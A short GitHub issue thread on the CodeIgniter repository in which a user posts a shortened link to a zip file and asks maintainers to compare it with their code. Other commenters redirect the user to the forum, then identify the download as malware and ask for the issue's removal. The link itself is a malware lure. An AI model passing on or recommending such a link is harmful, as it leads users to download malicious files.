### ISSUE TITLE
this is my code compare to yours please http://henurl.com/code.zip

### ISSUE THREAD

**Issue by rikojilani** [bcit-ci/CodeIgniter#5706]
this is my code compare to yours please
http://henurl.com/code.zip

**Comment by jim-parry** [comment]
Please ask support questions on our [forum](https://forum.codeigniter.com/index.php).

**Comment by nicolasnoble** [comment]
This is a malware. Please delete this issue.

**Comment by gxgpet** [comment]
@jim-parry check the title, too.
